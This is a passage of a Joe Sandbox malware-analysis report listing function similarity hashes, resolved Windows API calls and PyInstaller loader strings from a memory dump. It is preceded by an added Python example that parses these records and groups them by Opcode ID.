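The records above are the Joe Sandbox IDA Plugin similarity entries for individual functions recovered from the memory dump. To use them outside the report (deduplicate functions by Opcode ID, list the resolved API IDs, or pivot on the fuzzy hashes across other reports), the listing has to be parsed into structured records first. The following Python is an added example and is not part of the Joe Sandbox report or its tooling; the sample text is constructed from two of the records on this page, and the field names and helper functions are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample: two records copied from this page's "Memory Dump Source"
# listing (leading whitespace removed). Real exports may still carry the
# "Download File" link text on Associated lines; the parser strips it.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
• Instruction ID: 77121a806d9165bea2c7aaba9a9a6fb1808540df820670c2051d5efaa22095cf
• Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
• Instruction Fuzzy Hash: 4261FA22E0C2A2A6F76CBA28861463E6681EF43778F144639DA7DC67D1DE7DE840C700
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: 47e1752d72a26e8e4a54a1118d5733f31ee3a540483ce2786929be256c82dd77
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: 2A517476A1C661E6E724AB29C04423837A6EBD5B5CF245135CA4E977B4CF3AE842C740
"""

# One "• Key: value" line; the key stops at the first colon so the
# "Source File: ..., Offset: ..., based on PE: true" line keeps its full value.
FIELD_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*)$")


def parse_records(text):
    """Split the listing into one dict per 'Memory Dump Source' record.

    'Associated' lines are collected into a list; every other bullet becomes a
    single string field (empty string when the report left it blank). Section
    labels without a bullet ('Joe Sandbox IDA Plugin', 'Similarity') carry no
    data and are skipped.
    """
    records = []
    current = None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = {"associated": []}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if current is None or not m:
            continue
        key = m.group(1).strip().lower().replace(" ", "_")
        value = m.group(2).strip()
        if key == "associated":
            # Drop the interactive "Download File" link text if it was exported.
            current["associated"].append(value.replace("Download File", "").strip())
        else:
            current[key] = value
    return records


def index_by_opcode_id(records):
    """Group records by Opcode ID so the same function body collapses to one key."""
    index = defaultdict(list)
    for rec in records:
        if rec.get("opcode_id"):
            index[rec["opcode_id"]].append(rec)
    return dict(index)


def consistency_issues(records):
    """Flag records with missing identifiers or an Opcode ID that disagrees with
    its Opcode Fuzzy Hash (in this report the two are always identical)."""
    issues = []
    for i, rec in enumerate(records):
        for key in ("opcode_id", "instruction_id", "instruction_fuzzy_hash"):
            if not rec.get(key):
                issues.append((i, f"missing {key}"))
        if rec.get("opcode_id") != rec.get("opcode_fuzzy_hash"):
            issues.append((i, "opcode_id != opcode_fuzzy_hash"))
    return issues


def api_ids(records):
    """Sorted, de-duplicated non-empty API IDs: the quickest triage pivot."""
    return sorted({rec["api_id"] for rec in records if rec.get("api_id")})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", len(index_by_opcode_id(recs)), "distinct Opcode IDs")
    print("API IDs:", api_ids(recs))
    print("issues:", consistency_issues(recs))
```

Only the Opcode ID and Instruction Fuzzy Hash are worth pivoting on between reports; the Source File and Associated dump names encode this analysis's process and memory-region identifiers and will differ on every run.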
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: 4f6fa3933d20b37c1a36b9fabeeae5316ef1279ac7ee2b607117867212f70df7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23518036A1CA61D6E734AB29C04063C37AAEB85F58F244131DF4D977A5CF7AE892C740
APIs
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E50C0
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5101
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5126
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E514B
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5173
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E519B
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51C3
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51EB
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5213
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-2007157414
APIs
  • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF6404E7C97,?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E782C
  • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
Strings
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
APIs
Strings
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2030045667-3659356012
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2030045667-3659356012
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED06D
• GetLastError.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED07B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED0A5
• FreeLibrary.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED113
• GetProcAddress.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED11F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
APIs
• GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E821D
• K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E827A
  • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
• K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8305
• K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8364
• FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8375
• FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E838A
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
APIs
• GetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA5E7
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA61D
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA64A
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA65B
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA66C
• SetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA687
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
Strings
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                                                            • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                            • Instruction ID: 8fdea9c080354823018bc7794959ffe1a56e67eba9726776bf4b4746d7d2f12b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4321517261CA96A1FA24FB10F4517EA6364FF84788F400136EA8C93B99DF7CD645C780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                            • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction ID: d4fc5498ea7318f53537cfa785147e5897ce368d805e0ddb2dfcd704c11da3f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F04F21B1DB12A1FA18BB24A4983796321EF4AB65F540639D97D8A3E4CF2CD549C300
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction ID: 001b1ef2e6aecc85541d158118c28d47e3565e1bfbc7644172781a8234dd8869
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5711B232E1CA2362F65C3128D655B7D1140EF6737CF6A0634EDFE867DA8E2EA8808510
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6BF
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6DE
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA706
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA717
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA728
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                                                            • Instruction ID: 9270d81edf57d1095dfa68cf2718a3606eebceb162612fbf8d19bff2acd8ac43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E115E64F0C662E2FA58B7269645579219B5F983B0F084334EC3ECB7D6DE2CF9118701
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                                                            • Instruction ID: 51b98c31ef0ea062ffa1152fea1eb07504785dc448ceaa345d1643a5bbdef9b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 451123A0E4C227F2FA68B77644591B9228B4F49370E086734D93ECB3D2ED2CB8518302
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                            • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction ID: c929a27461afeba3e76d11864a1beaef009112ee6c67597de271af61dfb95879
